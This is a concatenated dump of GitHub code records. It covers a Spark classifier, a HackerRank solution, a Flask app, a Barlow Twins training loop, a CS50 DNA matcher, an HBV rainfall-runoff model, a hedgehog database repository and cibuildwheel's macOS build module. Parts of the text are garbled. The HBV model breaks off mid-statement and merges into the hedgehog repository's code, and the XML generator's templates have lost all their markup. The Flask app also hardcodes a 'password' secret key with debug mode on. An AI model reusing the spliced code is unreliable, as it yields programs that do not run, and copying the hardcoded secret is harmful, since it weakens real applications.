str(testErr))\n\n#Another Model\nmodel = GradientBoostedTrees.trainClassifier(trainingData,categoricalFeaturesInfo={}, numIterations=10)\npredictions = model.predict(testData.map(lambda x: x.features))\nlabelsAndPredictions = testData.map(lambda lp: lp.label).zip(predictions)\ntestErr = labelsAndPredictions.filter(lambda x: x[0] != x[1]).count() / float(testData.count())\nprint('Test Error = ' + str(testErr))\n# Similar performance.\n\n#Model for test dataset\n#Run the same pre processing and parsing steps\n#Building a model\nmodel = GradientBoostedTrees.trainClassifier(rddLPs,categoricalFeaturesInfo={},numIterations=10)\npredictions = model.predict(newData.map(lambda x: x.features))\n\n#Saving the model and the predictions\nmodel.save(sc, \"target/tmp/myGradientBoostingClassificationModel\")\npredicitons =predictions.coalesce(1)\npredictions.saveAsTextFile(\"Users/naresh/Downloads/Predictions\")\nprint('Test Error = ' + str(testErr))\n\n","repo_name":"nareshshah139/IE-Group-D-Term3","sub_path":"NLP/TextualEntailmentAssignment/Features.py","file_name":"Features.py","file_ext":"py","file_size_in_byte":3043,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"78"} +{"seq_id":"27169919267","text":"# Link: https://www.hackerrank.com/challenges/apple-and-orange/problem?isFullScreen=true&h_r=next-challenge&h_v=zen\n\n#!/bin/python3\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n#\n# Complete the 'countApplesAndOranges' function below.\n#\n# The function accepts following parameters:\n# 1. INTEGER s\n# 2. INTEGER t\n# 3. INTEGER a\n# 4. INTEGER b\n# 5. INTEGER_ARRAY apples\n# 6. 
INTEGER_ARRAY oranges\n#\n\n\ndef countApplesAndOranges(s, t, a, b, apples, oranges):\n # Write your code here\n applePosition = [apple+a for apple in apples]\n orangePosition = [orange+b for orange in oranges]\n\n appleCounter = 0\n orangeCounter = 0\n for i in range(len(applePosition)):\n if (applePosition[i] >= s and applePosition[i] <= t):\n appleCounter += 1\n for i in range(len(orangePosition)):\n if (orangePosition[i] >= s and orangePosition[i] <= t):\n orangeCounter += 1\n print(appleCounter)\n print(orangeCounter)\n\n\nif __name__ == '__main__':\n first_multiple_input = input().rstrip().split()\n\n s = int(first_multiple_input[0])\n\n t = int(first_multiple_input[1])\n\n second_multiple_input = input().rstrip().split()\n\n a = int(second_multiple_input[0])\n\n b = int(second_multiple_input[1])\n\n third_multiple_input = input().rstrip().split()\n\n m = int(third_multiple_input[0])\n\n n = int(third_multiple_input[1])\n\n apples = list(map(int, input().rstrip().split()))\n\n oranges = list(map(int, input().rstrip().split()))\n\n countApplesAndOranges(s, t, a, b, apples, oranges)\n","repo_name":"myahyaibrahim/personal-hackerrank-repo","sub_path":"Algorithms/apple-and-orange.py","file_name":"apple-and-orange.py","file_ext":"py","file_size_in_byte":1551,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"37301667146","text":"from flask import Flask, request, render_template, redirect, url_for\nfrom form import Todo\n\napp = Flask(__name__)\napp.config['SECRET_KEY'] = 'password'\n\n@app.route(\"/\", methods=['GET','POST'])\ndef hello_world():\n request_method = request.method\n if request.method == 'POST':\n first_name = request.form['firstname']\n return redirect(url_for('name', first_name=first_name))\n return render_template('hello.html', request_method=request_method)\n\n@app.route('/')\ndef name(first_name):\n return render_template('base.html', first_name=first_name)\n\n@app.route('/todo', methods=['GET', 'POST'])\ndef todo():\n todo_form = Todo()\n if todo_form.validate_on_submit():\n print(todo_form.content.data)\n return redirect('/')\n return render_template('todo.html', form=todo_form)\n\nif __name__ == '__main__':\n app.run(debug=True)\n\n ","repo_name":"dan4422/flask","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"43902816786","text":"import json\nimport math\nimport os\nimport logging\nimport signal\nimport subprocess\nimport sys\nimport time\nimport wandb\nwandb.login()\n\nfrom torch import nn\nimport torch\nimport torchvision\nfrom datasets.audioset import AudiosetDataset\nfrom efficientnet.model import BarlowTwins\nfrom optmizers.lars import LARS , adjust_learning_rate\n\nfrom datasets.data_utils import collate_fn_padd_2b\nfrom utils import get_upstream_parser ,AverageMeter\n\n\ndef handle_sigusr1(signum, frame):\n os.system(f'scontrol requeue {os.getenv(\"SLURM_JOB_ID\")}')\n exit()\n\n\ndef handle_sigterm(signum, frame):\n pass\n\n\n\ndef main_worker(gpu, args):\n args.rank += gpu\n if args.rank==0:\n run = wandb.init(project=\"pytorch-demo\", config=vars(args))\n torch.distributed.init_process_group(\n backend='nccl', init_method=args.dist_url,\n world_size=args.world_size, rank=args.rank)\n stats_file=None\n if args.rank == 0:\n args.exp_dir.mkdir(parents=True, exist_ok=True)\n stats_file = open(args.exp_dir / 'stats.txt', 'a', buffering=1)\n print(' 
'.join(sys.argv))\n print(' '.join(sys.argv), file=stats_file)\n\n torch.cuda.set_device(gpu)\n torch.backends.cudnn.benchmark = True\n\n model = BarlowTwins(args).cuda(gpu)\n model = nn.SyncBatchNorm.convert_sync_batchnorm(model)\n \n param_weights = []\n param_biases = []\n for param in model.parameters():\n if param.ndim == 1:\n param_biases.append(param)\n else:\n param_weights.append(param)\n parameters = [{'params': param_weights}, {'params': param_biases}]\n model = torch.nn.parallel.DistributedDataParallel(model, device_ids=[gpu])\n optimizer = LARS(parameters, lr=0, weight_decay=args.weight_decay,\n weight_decay_filter=True,\n lars_adaptation_filter=True)\n\n \n if args.resume:\n ckpt = torch.load(args.checkpoint_file,map_location='cpu')\n print(\"Resuming pretrain from epoch {0}\".format(ckpt['epoch']))\n start_epoch = ckpt['epoch']\n model.load_state_dict(ckpt['model'])\n optimizer.load_state_dict(ckpt['optimizer'])\n else:\n start_epoch = 0\n\n \n dataset = AudiosetDataset() # ! rewrite this \n sampler = torch.utils.data.distributed.DistributedSampler(dataset)\n assert args.batch_size % args.world_size == 0\n per_device_batch_size = args.batch_size // args.world_size\n loader = torch.utils.data.DataLoader(\n dataset, batch_size=per_device_batch_size, num_workers=args.workers,\n pin_memory=True, sampler=sampler,collate_fn = collate_fn_padd_2b)\n\n scaler = torch.cuda.amp.GradScaler()\n if args.rank == 0:\n print(\"Starting To Train\")\n wandb.watch(model, log=\"all\", log_freq=10)\n for epoch in range(start_epoch, args.epochs):\n sampler.set_epoch(epoch)\n train_one_epoch(epoch,model,optimizer,loader,scaler,args,gpu,stats_file)\n \n # if args.rank == 0:\n # save checkpoint \n # torch.save({'epoch': epoch + 1,\n # 'model': model.state_dict(),\n # 'optimizer' : optimizer.state_dict()},\n # args.exp_dir / 'checkpoints' / ('checkpoint_' + str(epoch + 1) + '.pth'))\n if args.rank==0:\n run.finish()\n\ndef train_one_epoch(epoch,model,optimizer,loader,scaler,args,gpu,stats_file):\n # per epoch stats\n batch_time = AverageMeter()\n losses = AverageMeter()\n on_diag_losses = AverageMeter()\n off_diag_losses = AverageMeter()\n data_time = AverageMeter()\n end = time.time()\n for step, (y1, y2) in enumerate(loader,start=epoch * len(loader)): \n data_time.update(time.time() - end)\n\n y1 = y1.cuda(gpu, non_blocking=True)\n y2 = y2.cuda(gpu, non_blocking=True)\n adjust_learning_rate(args, optimizer, loader, step)\n optimizer.zero_grad()\n with torch.cuda.amp.autocast():\n loss,on_diag,off_diag = model.forward(y1, y2)\n scaler.scale(loss).backward()\n scaler.step(optimizer)\n scaler.update()\n\n \n losses.update(loss, y1.size(0))\n on_diag_losses.update(on_diag,y1.size(0))\n off_diag_losses.update(off_diag,y1.size(0))\n batch_time.update(time.time() - end)\n end = time.time()\n\n if args.rank == 0:\n wandb.log({\"epoch\": epoch, \"instant_loss\": loss}, step=step)\n print('Epoch: [{0}][{1}/{2}]\\t'\n 'Time: {batch_time.val:.3f} ({batch_time.avg:.3f})\\t'\n 'Data: {data_time.val:.3f} ({data_time.avg:.3f})\\t'\n 'Loss: {loss.val:.4f} ({loss.avg:.4f})'\n .format(epoch, step%len(loader), len(loader), batch_time=batch_time,data_time=data_time, loss=losses))\n\n if step % args.print_freq == 0:\n if args.rank == 0:\n wandb.log({\"lr_weights\" :optimizer.param_groups[0]['lr'] ,\n \"lr_biases\" :optimizer.param_groups[1]['lr'],\n }, step=step)\n if args.rank == 0:\n wandb.log({\"loss_epoch\":losses.avg , \"on_diag_loss\": on_diag_losses.avg,\n \"off_diag_loss\" : off_diag_losses.avg 
},step=(epoch+1)*len(loader))\n    return losses.avg\n\n\n\ndef main():\n    parser=get_upstream_parser()\n    args = parser.parse_args()\n    args.ngpus_per_node = torch.cuda.device_count()\n    \n    # single-node distributed training\n    args.rank = 0\n    args.dist_url = 'tcp://localhost:58362'\n    args.world_size = args.ngpus_per_node\n    torch.multiprocessing.spawn(main_worker, (args,), args.ngpus_per_node)\n\n\nif __name__ == '__main__':\n    main()\n","repo_name":"svkatta/BarlowTwins","sub_path":"main_upstream.py","file_name":"main_upstream.py","file_ext":"py","file_size_in_byte":5641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"36921876806","text":"\"\"\"\n\n    \n        %s\n        %s\n        %s\n        %s\n        %s\n        %s\n        \n            %s\n            %s\n        \n        %s\n    \n\n\"\"\"\n\n\ndef convert_row(row):\n    return \"\"\"\n    %s\n    %s\n    %s\n    %s\n    %s\n    %s\n    \n        %s\n        %s\n    \n    %s\n    %s\n    %s\n\"\"\" % (\n        row.transaction_date, row.reseller_id, row.id, row.event_id, row.organizer_id, row.number_of_purchased_tickets,\n        row.total_amount, row.sales_channel, row.customer_first_name, row.customer_last_name, row.transaction_date,\n        row.reseller_id, row.transaction_date)\n\n\ndef get_xml(df):\n    xml = '\\n'.join(df.apply(convert_row, axis=1))\n    xml = '\\n' + xml + '\\n'\n    return xml\n\n# print('\\n'.join([convert_row(row) for row in data[1:]]))\n","repo_name":"nikhilcss97/Data-Pipeline-for-an-event-ticketing-platform","sub_path":"src/data_generation/final_data_scripts/generate_xml.py","file_name":"generate_xml.py","file_ext":"py","file_size_in_byte":1489,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"78"} +{"seq_id":"11460295125","text":"from sys import argv, exit\nimport csv\n\n# Checking if the command line argument count is valid (= 3); if not, printing an error message.\nif len(argv) != 3:\n    print(\"Invalid command line argument. Try again!!\")\n    exit(1)\n\n# open the CSV file and DNA sequence, read contents into memory (Python's csv module reader and DictReader can be helpful), storing the dna sequence in a string\n# argv[0] is the name of the file; the name \"python\" is not a command line argument\n# reading the sequences and storing in the string\nwith open(argv[2], \"r\") as dna_sequence_file:\n    dna_sequence_file_reader = csv.reader(dna_sequence_file)\n    for row in dna_sequence_file_reader:\n        dna_list = row\n        print(dna_list)\n\n# copying the list into dictionaries\ndna = dna_list[0]\nprint(dna)\n\n\n# accessing the textfile and getting the DNA sequences\nwith open(argv[1], \"r\") as text_file:\n    text_file_reader = csv.reader(text_file)\n\n    # the pop(0) will remove the first element in the row\n    for row in text_file_reader:\n        person_dna_sequence = row\n        person_dna_sequence.pop(0)\n        # print(person_dna_sequence)\n        break\n# copying the above list into a dictionary\nsequences = {}\n\n# print(sequences)\nfor number in person_dna_sequence:\n    sequences[number] = 1\n\nprint (sequences)\n\n# iterating over the sequences; 
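# [Hedged aside] The longest-run counting that the loop below implements by
# hand can be sketched compactly; `longest_run` is a hypothetical helper name:
def longest_run(seq, unit):
    best = run = 0
    i = 0
    while i + len(unit) <= len(seq):
        if seq[i:i + len(unit)] == unit:
            run += 1
            best = max(best, run)
            i += len(unit)          # consecutive repeats must be back-to-back
        else:
            run = 0
            i += 1
    return best

assert longest_run("AAGGTAGGTAGGTT", "AGGT") == 3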
if the repetitions of the values from the sequence dictionary are found, it counts them\nfor key in sequences:\n    max_str = 0\n    cur_max_str = 0\n    for i in range(len(dna)):\n\n        # to make sure that max_str is not the summation of total STRs in the list but the maximum number of times it repeats continuously,\n        # if cur_max_str is greater than 0, we skip to the end\n        while cur_max_str > 0:\n            cur_max_str -= 1\n\n            # print(f\"current maximum 1 = {cur_max_str}\")\n            continue\n\n        # if the dna sequence matches the key and there is a continuous repetition, incrementing cur_max_str\n        if dna[i: i + len(key)] == key:\n            while dna[i - len(key): i] == dna[i: i + len(key)]:\n                cur_max_str += 1\n\n                # print(f\"current maximum 2 = {cur_max_str}\")\n                i += len(key)\n\n        # comparing the cur_max_str and if it is higher than the max_str, setting it as the max_str\n        if cur_max_str > max_str:\n            max_str = cur_max_str\n\n    # setting the max_str in the dictionary using the corresponding key\n    sequences[key] += max_str\n\n# print(sequences)\n\n# opening the CSV file again and iterating over it to compare the dna; if the dna is matched, printing the corresponding name, otherwise printing no match\nwith open(argv[1]) as text_file:\n    text_file_reader = csv.DictReader(text_file)\n    for person in text_file_reader:\n        match = 0\n\n        # comparing the dna and if a match is found, printing the name; if not, printing \"No match\" once after the loop\n        for dna in sequences:\n            if sequences[dna] == int(person[dna]):\n                match += 1\n        if match == len(sequences):\n            print(person['name'])\n            exit(0)\n    print(\"No match\")","repo_name":"thapaSujit/CS50","sub_path":"Pset 6/python/dna/dna.py","file_name":"dna.py","file_ext":"py","file_size_in_byte":3049,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"27260254848","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom Weigfun import Weigfun\n\ndef HBVMod( Par,forcing):\n\t#HBVpareto Calculates values of 3 objective functions for HBV model\n\n    Imax=Par[0]\n    Ce=Par[1]\n    Sumax=Par[2]\n    beta=Par[3]\n    Pmax = Par[4]\n    #D=Par[4]\n    Tlag=Par[5]\n    Kf=Par[6]\n    Ks=Par[7]\n\n\n    Qo=forcing[:,0]\n    Prec=forcing[:,1]\n    Etp=forcing[:,2]\n\n\n    tmax=len(Prec)\n    Si=np.zeros(tmax)\n    Su=np.zeros(tmax)\n    Sf=np.zeros(tmax)\n    Ss=np.zeros(tmax) \n    Eidt=np.zeros(tmax)\n    Eadt=np.zeros(tmax)\n    Qtotdt=np.zeros(tmax)\n\n    Si[0]=0\n    Su[0]=0\n    Sf[0]=0\n    Ss[0]=0\n\n    dt=1\n\n\t#\n\t# Model 1 SOF1\n    for i in range(0,tmax):\n        Pdt=Prec[i]*dt\n        Epdt=Etp[i]*dt\n\t    # Interception Reservoir\n        if Pdt>0:\n            Si[i]=Si[i]+Pdt\n            Pedt=max(0,Si[i]-Imax)\n            Si[i]=Si[i]-Pedt\n            Eidt[i]=0\n        else:\n\t\t# Evaporation only when there is no rainfall\n            Pedt=0\n            Eidt[i]=min(Epdt,Si[i])\n            Si[i]=Si[i]-Eidt[i]\n\t    \n        if i<tmax-1:\n            Si[i+1]=Si[i]\n\n        if Pedt>0:\n            rho=(Su[i]/Sumax)**beta \n            Su[i]=Su[i]+(1-rho)*Pedt\n            Qufdt=rho*Pedt\n        else:\n            Qufdt=0\n\t    \n\t    # Transpiration\n        Epdt=max(0,Epdt-Eidt[i])\n        Eadt[i]=Epdt*(Su[i]/(Sumax*Ce))\n        Eadt[i]=min(Eadt[i],Su[i])\n        Su[i]=Su[i]-Eadt[i]\n\t    # Percolation\n        #In the hillslope\n        #Qusdt=D * Qufdt\n        # Normal one\n        Qusdt = Pmax *(Su[i]/Sumax)\n        Su[i]=Su[i]-min(Qusdt,Su[i])\n        if i HedgehogInDB:\n        query_values = new_hedgehog.dict()\n        hedgehog = await self.db.fetch_one(\n            query=query.CREATE_HEDGEHOG_QUERY,\n            values=query_values\n        )\n        return HedgehogInDB(**hedgehog)\n\n    async def get_hedgehog_by_id(self, *, id: int) -> HedgehogInDB:\n        hedgehog = await self.db.fetch_one(\n            query=query.GET_HEDGEHOG_BY_ID_QUERY,\n            values={'id': id}\n        )\n        if not hedgehog:\n            return None\n        return HedgehogInDB(**hedgehog)\n\n    async def get_all_hedgehogs(self) -> 
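# [Hedged aside] The interception bucket above follows the generic reservoir
# pattern: add inflow, spill anything over capacity, evaporate from what is
# left on dry steps. A single-step toy version (made-up numbers):
def intercept_step(S, P, Ep, Imax):
    S = S + P                          # rain fills the interception store
    spill = max(0.0, S - Imax)         # overflow becomes effective rainfall
    S -= spill
    E = min(Ep, S) if P == 0 else 0.0  # evaporation only on rain-free steps
    return S - E, spill, E

assert intercept_step(S=0.5, P=2.0, Ep=0.3, Imax=1.5) == (1.5, 1.0, 0.0)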
List[HedgehogInDB]:\n hedgehog_records = await self.db.fetch_all(\n query=query.GET_ALL_HEDGEHOGS_QUERY)\n return [HedgehogInDB(**item) for item in hedgehog_records]\n\n async def update_hedgehog(\n self, *, id: int, hedgehog_update: HedgehogUpdate\n ) -> HedgehogInDB:\n hedgehog = await self.get_hedgehog_by_id(id=id)\n if not hedgehog:\n return None\n hedgehog_update_params = hedgehog.copy(\n update=hedgehog_update.dict(exclude_unset=True))\n if hedgehog_update_params.color_type is None:\n raise HTTPException(\n status_code=HTTP_400_BAD_REQUEST,\n detail='Invalid color type. Cannot be None.')\n\n try:\n updated_hedgehog = await self.db.fetch_one(\n query=query.UPDATE_HEDGEHOG_BY_ID_QUERY,\n values=hedgehog_update_params.dict()\n )\n return HedgehogInDB(**updated_hedgehog)\n except Exception as e:\n print(e)\n raise HTTPException(\n status_code=HTTP_400_BAD_REQUEST,\n detail='Invalid update params.')\n\n async def delete_hedgehog_by_id(self, *, id: int) -> int:\n hedgehog = await self.get_hedgehog_by_id(id=id)\n if not hedgehog:\n return None\n deleted_id = await self.db.execute(\n query=query.DELETE_HEDGEHOG_BY_ID_QUERY, values={'id': id})\n return deleted_id\n","repo_name":"tenra/hedgehog","sub_path":"backend/app/db/repositories/hedgehogs.py","file_name":"hedgehogs.py","file_ext":"py","file_size_in_byte":2426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"78"} +{"seq_id":"21745692984","text":"import os\nimport shlex\nimport shutil\nimport subprocess\nimport sys\nimport tempfile\nfrom collections import namedtuple\nfrom glob import glob\n\nfrom .util import (\n download,\n get_build_verbosity_extra_flags,\n prepare_command,\n)\n\n\ndef call(args, env=None, cwd=None, shell=False):\n # print the command executing for the logs\n if shell:\n print('+ %s' % args)\n else:\n print('+ ' + ' '.join(shlex.quote(a) for a in args))\n\n return subprocess.check_call(args, env=env, cwd=cwd, shell=shell)\n\n\ndef get_python_configurations(build_selector):\n PythonConfiguration = namedtuple('PythonConfiguration', ['version', 'identifier', 'url'])\n python_configurations = [\n PythonConfiguration(version='2.7', identifier='cp27-macosx_x86_64', url='https://www.python.org/ftp/python/2.7.17/python-2.7.17-macosx10.9.pkg'),\n PythonConfiguration(version='3.5', identifier='cp35-macosx_x86_64', url='https://www.python.org/ftp/python/3.5.4/python-3.5.4-macosx10.6.pkg'),\n PythonConfiguration(version='3.6', identifier='cp36-macosx_x86_64', url='https://www.python.org/ftp/python/3.6.8/python-3.6.8-macosx10.9.pkg'),\n PythonConfiguration(version='3.7', identifier='cp37-macosx_x86_64', url='https://www.python.org/ftp/python/3.7.6/python-3.7.6-macosx10.9.pkg'),\n PythonConfiguration(version='3.8', identifier='cp38-macosx_x86_64', url='https://www.python.org/ftp/python/3.8.2/python-3.8.2-macosx10.9.pkg'),\n PythonConfiguration(version='2.7-v7.3.0', identifier='pp27-macosx_x86_64', url='https://bitbucket.org/pypy/pypy/downloads/pypy2.7-v7.3.0-osx64.tar.bz2'),\n PythonConfiguration(version='3.6-v7.3.0', identifier='pp36-macosx_x86_64', url='https://bitbucket.org/pypy/pypy/downloads/pypy3.6-v7.3.0-osx64.tar.bz2'),\n ]\n\n # skip builds as required\n return [c for c in python_configurations if build_selector(c.identifier)]\n\n\nSYMLINKS_DIR = '/tmp/cibw_bin'\n\n\ndef make_symlinks(installation_bin_path, python_executable, pip_executable):\n assert os.path.exists(os.path.join(installation_bin_path, python_executable))\n\n # Python bin folders on Mac don't symlink `python3` to 
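# [Hedged sketch] The symlink juggling described above reduces to: wipe the
# link directory, recreate it, and point a stable name at the active binary.
import os, shutil, sys, tempfile

link_dir = os.path.join(tempfile.mkdtemp(), "cibw_bin")  # stand-in for /tmp/cibw_bin
if os.path.exists(link_dir):
    shutil.rmtree(link_dir)          # start from a clean slate, as above
os.makedirs(link_dir)
os.symlink(sys.executable, os.path.join(link_dir, "python"))
assert os.path.islink(os.path.join(link_dir, "python"))
shutil.rmtree(link_dir)              # tidy up after the demo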
`python`, and neither\n # does PyPy for `pypy` or `pypy3`, so we do that so `python` and `pip` always\n # point to the active configuration.\n if os.path.exists(SYMLINKS_DIR):\n shutil.rmtree(SYMLINKS_DIR)\n os.makedirs(SYMLINKS_DIR)\n\n os.symlink(os.path.join(installation_bin_path, python_executable), os.path.join(SYMLINKS_DIR, 'python'))\n os.symlink(os.path.join(installation_bin_path, python_executable + '-config'), os.path.join(SYMLINKS_DIR, 'python-config'))\n os.symlink(os.path.join(installation_bin_path, pip_executable), os.path.join(SYMLINKS_DIR, 'pip'))\n\n\ndef install_cpython(version, url):\n installed_system_packages = subprocess.check_output(['pkgutil', '--pkgs'], universal_newlines=True).splitlines()\n\n # if this version of python isn't installed, get it from python.org and install\n python_package_identifier = 'org.python.Python.PythonFramework-{}'.format(version)\n if python_package_identifier not in installed_system_packages:\n # download the pkg\n download(url, '/tmp/Python.pkg')\n # install\n call(['sudo', 'installer', '-pkg', '/tmp/Python.pkg', '-target', '/'])\n # patch open ssl\n if version == '3.5':\n open_ssl_patch_url = 'https://github.com/mayeut/patch-macos-python-openssl/releases/download/v1.0.2t/patch-macos-python-%s-openssl-v1.0.2t.tar.gz' % version\n download(open_ssl_patch_url, '/tmp/python-patch.tar.gz')\n call(['sudo', 'tar', '-C', '/Library/Frameworks/Python.framework/Versions/{}/'.format(version), '-xmf', '/tmp/python-patch.tar.gz'])\n\n installation_bin_path = '/Library/Frameworks/Python.framework/Versions/{}/bin'.format(version)\n python_executable = 'python3' if version[0] == '3' else 'python'\n pip_executable = 'pip3' if version[0] == '3' else 'pip'\n make_symlinks(installation_bin_path, python_executable, pip_executable)\n\n return installation_bin_path\n\n\ndef install_pypy(version, url):\n pypy_tar_bz2 = url.rsplit('/', 1)[-1]\n assert pypy_tar_bz2.endswith(\".tar.bz2\")\n pypy_base_filename = os.path.splitext(os.path.splitext(pypy_tar_bz2)[0])[0]\n installation_path = os.path.join('/tmp', pypy_base_filename)\n if not os.path.exists(installation_path):\n download(url, os.path.join(\"/tmp\", pypy_tar_bz2))\n call(['tar', '-C', '/tmp', '-xf', os.path.join(\"/tmp\", pypy_tar_bz2)])\n\n # fix PyPy 7.3.0 bug resulting in wrong macOS platform tag\n if version.endswith(\"-v7.3.0\") and version[0] == '3':\n patch_file = os.path.abspath(os.path.join(os.path.dirname(__file__), 'resources', 'pypy3.6.patch'))\n sysconfigdata_file = os.path.join(installation_path, 'lib_pypy', '_sysconfigdata.py')\n call(['patch', sysconfigdata_file, patch_file, '-N']) # Always has nonzero return code\n\n installation_bin_path = os.path.join(installation_path, 'bin')\n python_executable = 'pypy3' if version[0] == '3' else 'pypy'\n pip_executable = 'pip3' if version[0] == '3' else 'pip'\n make_symlinks(installation_bin_path, python_executable, pip_executable)\n\n return installation_bin_path\n\n\ndef build(project_dir, output_dir, test_command, before_test, test_requires, test_extras, before_build, build_verbosity, build_selector, repair_command, environment):\n abs_project_dir = os.path.abspath(project_dir)\n temp_dir = tempfile.mkdtemp(prefix='cibuildwheel')\n built_wheel_dir = os.path.join(temp_dir, 'built_wheel')\n repaired_wheel_dir = os.path.join(temp_dir, 'repaired_wheel')\n\n python_configurations = get_python_configurations(build_selector)\n\n get_pip_url = 'https://bootstrap.pypa.io/get-pip.py'\n get_pip_script = '/tmp/get-pip.py'\n\n # get latest pip once and for 
all\n download(get_pip_url, get_pip_script)\n\n for config in python_configurations:\n if config.identifier.startswith('cp'):\n installation_bin_path = install_cpython(config.version, config.url)\n elif config.identifier.startswith('pp'):\n installation_bin_path = install_pypy(config.version, config.url)\n else:\n raise ValueError(\"Unknown Python implementation\")\n\n env = os.environ.copy()\n env['PATH'] = os.pathsep.join([\n SYMLINKS_DIR,\n installation_bin_path,\n env['PATH'],\n ])\n\n # Fix issue with site.py setting the wrong `sys.prefix`, `sys.exec_prefix`,\n # `sys.path`, ... for PyPy: https://foss.heptapod.net/pypy/pypy/issues/3175\n # Also fix an issue with the shebang of installed scripts inside the\n # testing virtualenv- see https://github.com/theacodes/nox/issues/44 and\n # https://github.com/pypa/virtualenv/issues/620\n # Also see https://github.com/python/cpython/pull/9516\n env.pop('__PYVENV_LAUNCHER__', None)\n env = environment.as_dictionary(prev_environment=env)\n\n # check what version we're on\n call(['which', 'python'], env=env)\n call(['python', '--version'], env=env)\n which_python = subprocess.check_output(['which', 'python'], env=env, universal_newlines=True).strip()\n if which_python != '/tmp/cibw_bin/python':\n print(\"cibuildwheel: python available on PATH doesn't match our installed instance. If you have modified PATH, ensure that you don't overwrite cibuildwheel's entry or insert python above it.\", file=sys.stderr)\n exit(1)\n\n # install pip & wheel\n call(['python', get_pip_script], env=env, cwd=\"/tmp\")\n assert os.path.exists(os.path.join(installation_bin_path, 'pip'))\n call(['which', 'pip'], env=env)\n call(['pip', '--version'], env=env)\n which_pip = subprocess.check_output(['which', 'pip'], env=env, universal_newlines=True).strip()\n if which_pip != '/tmp/cibw_bin/pip':\n print(\"cibuildwheel: pip available on PATH doesn't match our installed instance. 
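# [Minimal sketch] The PATH precedence the check above relies on: whichever
# directory comes first in the os.pathsep-joined PATH wins the `which` lookup.
import os

env = os.environ.copy()
env["PATH"] = os.pathsep.join(["/tmp/cibw_bin", "/usr/local/bin", env["PATH"]])
assert env["PATH"].split(os.pathsep)[0] == "/tmp/cibw_bin"   # first hit wins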
If you have modified PATH, ensure that you don't overwrite cibuildwheel's entry or insert pip above it.\", file=sys.stderr)\n exit(1)\n call(['pip', 'install', '--upgrade', 'setuptools', 'wheel', 'delocate'], env=env)\n\n # setup target platform, only required for python 3.5\n if config.version == '3.5':\n if '_PYTHON_HOST_PLATFORM' not in env:\n # cross-compilation platform override\n env['_PYTHON_HOST_PLATFORM'] = 'macosx-10.9-x86_64'\n if 'ARCHFLAGS' not in env:\n # https://github.com/python/cpython/blob/a5ed2fe0eedefa1649aa93ee74a0bafc8e628a10/Lib/_osx_support.py#L260\n env['ARCHFLAGS'] = '-arch x86_64'\n if 'MACOSX_DEPLOYMENT_TARGET' not in env:\n env['MACOSX_DEPLOYMENT_TARGET'] = '10.9'\n\n # run the before_build command\n if before_build:\n before_build_prepared = prepare_command(before_build, project=abs_project_dir)\n call(before_build_prepared, env=env, shell=True)\n\n # build the wheel\n if os.path.exists(built_wheel_dir):\n shutil.rmtree(built_wheel_dir)\n os.makedirs(built_wheel_dir)\n call(['pip', 'wheel', abs_project_dir, '-w', built_wheel_dir, '--no-deps'] + get_build_verbosity_extra_flags(build_verbosity), env=env)\n built_wheel = glob(os.path.join(built_wheel_dir, '*.whl'))[0]\n\n # repair the wheel\n if os.path.exists(repaired_wheel_dir):\n shutil.rmtree(repaired_wheel_dir)\n os.makedirs(repaired_wheel_dir)\n if built_wheel.endswith('none-any.whl') or not repair_command:\n # pure Python wheel or empty repair command\n shutil.move(built_wheel, repaired_wheel_dir)\n else:\n repair_command_prepared = prepare_command(repair_command, wheel=built_wheel, dest_dir=repaired_wheel_dir)\n call(repair_command_prepared, env=env, shell=True)\n repaired_wheel = glob(os.path.join(repaired_wheel_dir, '*.whl'))[0]\n\n if test_command:\n # set up a virtual environment to install and test from, to make sure\n # there are no dependencies that were pulled in at build time.\n call(['pip', 'install', 'virtualenv'], env=env)\n venv_dir = tempfile.mkdtemp()\n call(['python', '-m', 'virtualenv', venv_dir], env=env)\n\n virtualenv_env = env.copy()\n virtualenv_env['PATH'] = os.pathsep.join([\n os.path.join(venv_dir, 'bin'),\n virtualenv_env['PATH'],\n ])\n virtualenv_env[\"__CIBW_VIRTUALENV_PATH__\"] = venv_dir\n\n # check that we are using the Python from the virtual environment\n call(['which', 'python'], env=virtualenv_env)\n\n if before_test:\n before_test_prepared = prepare_command(before_test, project=abs_project_dir)\n call(before_test_prepared, env=virtualenv_env, shell=True)\n\n # install the wheel\n call(['pip', 'install', repaired_wheel + test_extras], env=virtualenv_env)\n\n # test the wheel\n if test_requires:\n call(['pip', 'install'] + test_requires, env=virtualenv_env)\n\n # run the tests from $HOME, with an absolute path in the command\n # (this ensures that Python runs the tests against the installed wheel\n # and not the repo code)\n test_command_prepared = prepare_command(test_command, project=abs_project_dir)\n call(test_command_prepared, cwd=os.environ['HOME'], env=virtualenv_env, shell=True)\n\n # clean up\n shutil.rmtree(venv_dir)\n\n # we're all done here; move it to output (overwrite existing)\n dst = os.path.join(output_dir, os.path.basename(repaired_wheel))\n shutil.move(repaired_wheel, dst)\n","repo_name":"Chia-Network/cibuildwheel","sub_path":"cibuildwheel/macos.py","file_name":"macos.py","file_ext":"py","file_size_in_byte":11893,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"78"} +{"seq_id":"12501997624","text":"from unittest 
